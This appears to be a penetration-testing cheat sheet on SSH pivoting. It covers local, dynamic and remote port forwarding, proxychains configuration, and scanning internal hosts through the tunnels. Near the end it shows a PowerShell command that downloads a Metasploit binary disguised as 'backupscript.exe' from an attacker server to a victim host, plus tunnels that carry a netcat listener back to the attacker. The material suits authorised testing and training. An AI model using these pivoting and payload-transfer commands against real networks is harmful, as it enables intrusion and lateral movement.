SSH
This is more of a cheat sheet for commands.
Local Port Forwarding
Local Port Forwarding
ssh -L 1234:localhost:3306 [email protected]Opens a listener on local port 1234 (our machine) and sends all traffic to remote port 3306 (10.129.202.64).
Forwarding multiple ports
ssh -L 1234:localhost:3306 8080:localhost:80 [email protected]This SSH command connects to a remote machine and sets up two local port forwards:
Local port 1234 forwards to port 3306 on the remote machine (typically MySQL).
Local port 8080 forwards to port 80 on the remote machine (typically HTTP).
Local Port Forwarding Example
jumphost@ubuntu ssh -N -L 0.0.0.0:4455:172.16.50.217:445 [email protected]Opens a listener on port 4455 (CONFULENCE01 Jump Host) and forwards all traffic through 10.4.50.215 to 172.16.50.217:445. (PGDATABASE01).
NOTE: -N flag is means execute no remote commands. No shell will be opened.
Dynamic Port Forwarding - Tunneling over SOCKS proxy
Local port forwarding is limited to one socket per SSH connection. OpenSSH allows for dynamic port forwarding. From a single listening port, packets can be forwarded to any socket that the server can route to. This works because the listening port creates a SOCKS proxy.
D_ynamic Port Forwarding from Attack Host:_
attacker@kali$ ssh -D 9050 [email protected]NOTE: The -D flag enables dynamic port forwarding & ssh acts as a SOCKS server.
$ tail -4 /etc/proxychains.conf
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050D_ynamic Port Forwarding From Jump Host:_
jump-host@ubuntu$ ssh -D 9050 [email protected]┌──(kali㉿kali)-[~]
└─$ tail -f /etc/proxychains4.conf
# defaults set to "tor"
#socks4 127.0.0.1 9050
socks5 192.168.198.63 9050 # Ip address of jump host
Using tools with Proxychains:
Nmap:
This is my preferred nmap command to run. (172.16.50.217 is in internal network)
kali@kali:~$ proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217xfreerdp:
kali@kali proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123Remote Port Forwarding
Also known as Reverse Port Forwarding. In real world scenarios it is likely we'll encounter a firewall that heavily restricts inbound connections. Outbound connections however, are less likely to be blocked.
Start SSH Service
kali:~$ sudo systemctl start sshConnect back to Kali Host
The below command opens a port on localhost 2345 on our kali machine. All traffic is forwarded through the jump host to 10.4.50.215:5432.
victim@jump-host$ ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 [email protected]Verifying Port Forward
As we can see, our kali box is listening on 127.0.0.1 2345
kali@kali$ ss -ntlpu
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:52704 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:2345 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:* Remote Dynamic Port Forwarding
NOTE: This tends to be the most optimal setup for port forwarding during engagements. We get all the benefits from Dynamic Port forwarding along with the remote configurations.
Create Dynamic Remote Port Forward
Creating a Dynamic Remote Port Forward is similar to creating a Remote port forward. We use the -R command but only with one port. We do not specify and address! Neither do we use -D!
jumphost@ubuntu$ ssh -N -R 9998 [email protected]Update SOCKS Proxy - proxychains
kali@kali:~$ tail /etc/proxychains4.conf
# proxy types: http, socks4, socks5, raw
# * raw: The traffic is simply forwarded to the proxy without modification.
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 9998 # IP address is localhost 127.0.0.1Verifying Port Forward
As we can see, our kali box is listening on 127.0.0.1 9998
kali@kali$ ss -ntlpu
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:52704 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:9998 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 [::]:22Additional Info
Transferring Metasploit Binary to Victim (on internal network).
We may need to transfer a binary to a machine we've gained access to so we can port forward.
PS C:\Windows\system32> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"Tunneling to Kali Web Server
If the host has ssh we can connect back to our kali box to tunnel traffic.
This is a command to tunnel all traffic through a jump host back to our kali web server. This is useful when downloading tool to a host inside an internal network.
C:\Users\web_svc>ssh -N -L 0.0.0.0:1234:192.168.45.186:8000 [email protected]Tunneling NC Listener
Like the above command, we can do the same to create a tunnel for a nc listener
C:\Users\web_svc>ssh -N -L 0.0.0.0:1234:192.168.45.186:4444 [email protected]Tunnel Internal Web Service
Like we did above we can portforward an internal web service back to our kali host.
Reverse Port Forward
victim@ubuntu ssh -N -R web_service_port:localhost:local_port [email protected]Local Port Forward
kali@kali ssh -L local_port:localhost:web_service_port victim@victim_ipPort Forwarding an Internal Web Service
Say we discover a web service that is running locally, or only allows 127.0.0.1 to authenticate. We can port forward the service back to our kali host and access it locally.
$ ssh [email protected] -L 8443:127.0.0.1:8443Last updated